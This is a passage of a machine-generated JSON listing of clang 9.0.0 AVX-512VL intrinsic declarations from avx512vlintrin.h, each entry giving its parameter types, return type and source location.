"name": "_mm256_storeu_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5720:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_mask_storeu_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5729:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_storeu_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5737:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_mask_storeu_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5746:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_storeu_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5754:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_mask_storeu_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5763:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_mask_storeu_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5771:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_mask_storeu_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5779:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_mask_storeu_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5787:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_mask_storeu_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5795:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_mask_unpackhi_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5804:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_unpackhi_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5812:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_mask_unpackhi_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5820:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_maskz_unpackhi_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5828:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm_mask_unpackhi_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5836:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_unpackhi_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5844:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_mask_unpackhi_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5852:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskz_unpackhi_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5860:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm_mask_unpacklo_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5868:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_unpacklo_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5876:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_mask_unpacklo_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5884:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_maskz_unpacklo_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5892:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm_mask_unpacklo_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5900:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_unpacklo_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5908:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_mask_unpacklo_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5916:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskz_unpacklo_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5924:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm_rcp14_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5932:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_mask_rcp14_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5941:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_rcp14_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5949:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_rcp14_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5958:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_mask_rcp14_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5967:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_maskz_rcp14_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5975:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm_rcp14_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5984:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_mask_rcp14_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:5993:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_rcp14_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6001:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_rcp14_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6010:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_mask_rcp14_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6019:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskz_rcp14_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6027:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm_mask_permutevar_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6076:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maskz_permutevar_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6084:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_mask_permutevar_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6092:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_maskz_permutevar_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6100:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm_mask_permutevar_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6108:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maskz_permutevar_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6116:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm256_mask_permutevar_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6124:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maskz_permutevar_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6132:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm_test_epi32_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6140:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__mmask8" } }, { "tag": "function", "name": "_mm_mask_test_epi32_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6146:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__mmask8" } }, { "tag": "function", "name": "_mm256_test_epi32_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6153:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__mmask8" } }, { "tag": "function", "name": "_mm256_mask_test_epi32_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6160:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__mmask8" } }, { "tag": "function", "name": "_mm_test_epi64_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6167:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__mmask8" } }, { "tag": "function", "name": "_mm_mask_test_epi64_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6173:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__mmask8" } }, { "tag": "function", "name": "_mm256_test_epi64_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6180:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__mmask8" } }, { "tag": "function", "name": "_mm256_mask_test_epi64_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6187:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__mmask8" } }, { "tag": "function", "name": "_mm_testn_epi32_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6194:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__mmask8" } }, { "tag": "function", "name": "_mm_mask_testn_epi32_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6200:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__mmask8" } }, { "tag": "function", "name": "_mm256_testn_epi32_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6207:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__mmask8" } }, { "tag": "function", "name": "_mm256_mask_testn_epi32_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6214:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__mmask8" } }, { "tag": "function", "name": "_mm_testn_epi64_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6221:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__mmask8" } }, { "tag": "function", "name": "_mm_mask_testn_epi64_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6227:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__mmask8" } }, { "tag": "function", "name": "_mm256_testn_epi64_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6234:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__mmask8" } }, { "tag": "function", "name": "_mm256_mask_testn_epi64_mask", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6241:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__mmask8" } }, { "tag": "function", "name": "_mm_mask_unpackhi_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6248:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_unpackhi_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6256:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_unpackhi_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6264:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_unpackhi_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6272:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_mask_unpackhi_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6280:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__W", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_unpackhi_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlintrin.h:6288:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { 